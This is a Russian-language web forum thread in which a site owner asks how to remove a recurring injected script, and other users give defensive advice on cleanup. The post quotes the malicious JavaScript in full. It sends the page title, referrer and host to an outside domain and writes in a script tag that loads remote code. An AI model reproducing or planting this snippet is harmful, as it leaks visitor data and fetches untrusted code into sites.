Вирус на сайте

Тема в разделе "JavaScript", создана пользователем Flexx, 19 ноя 2015.

  1. Flexx

    Flexx

    Регистрация:
    8 янв 2013
    Сообщения:
    122
    Симпатии:
    86
    здравствуйте,уважаемые форумчане.Столкнулся с проблемой.На сайте в хэдере постоянно появляется новый скрип,такого содержания
    Код:
    <script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://epsomdownsclinic.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
    
    Как можно это исправить ?
    Даже если я вручную его затираю,он все равно появляется.Поддомене так же заражены этим скриптом
     
  2. $iD

    $iD Команда форума

    Регистрация:
    13 мар 2012
    Сообщения:
    3.581
    Симпатии:
    1.482
    скорее всего вас взломали через ftp. (ну или же взломали весь хостинг :Smile: )

    логично, что нужно поменять пароль, как минимум)

    + стоит поискать скрипты, которые вполне могут заниматься вставкой кода)
     
  3. Flexx

    Flexx

    Регистрация:
    8 янв 2013
    Сообщения:
    122
    Симпатии:
    86
    $iD, Пароль менял уже.Все сайты,что были на хосте их удалили через какой то файл.Слава богу хостер восстановил все.
    Как можно найти этот файл ?
     
  4. $iD

    $iD Команда форума

    Регистрация:
    13 мар 2012
    Сообщения:
    3.581
    Симпатии:
    1.482
    у хостера все сайты удалили? если да, то дыра какая-то глобальная)

    1. сменить хостера.
    2. выкачать скрипт и искать ручками левый скрипт) (смотря что там у вас за движок)
    3. удалить все файлы и залить скрипт на чистую (сохранив конфиги, картинки пользователей и т.д., если они есть)
     
  5. cobalt

    cobalt

    Регистрация:
    18 окт 2012
    Сообщения:
    278
    Симпатии:
    128
    Выкачайте сайт на комп и проверьте антивирусом. Вполне может отловить пакость.
     
  6. nullk

    nullk

    Регистрация:
    20 ноя 2015
    Сообщения:
    0
    Симпатии:
    0
    логи обычно смотрят в таких случаях сперва. и выкладывают в топик с вопросом
     
  7. rollmaria

    rollmaria

    Регистрация:
    21 ноя 2015
    Сообщения:
    2
    Симпатии:
    0
    проверьте антивирусом локально, у меня была похожая ситуация
     
  8. ooops

    ooops

    Регистрация:
    8 окт 2015
    Сообщения:
    9
    Симпатии:
    0
    Да прчем тут антивирус епрст) логи, ничего не дало, ищем опасные функции , обфускацию и т.д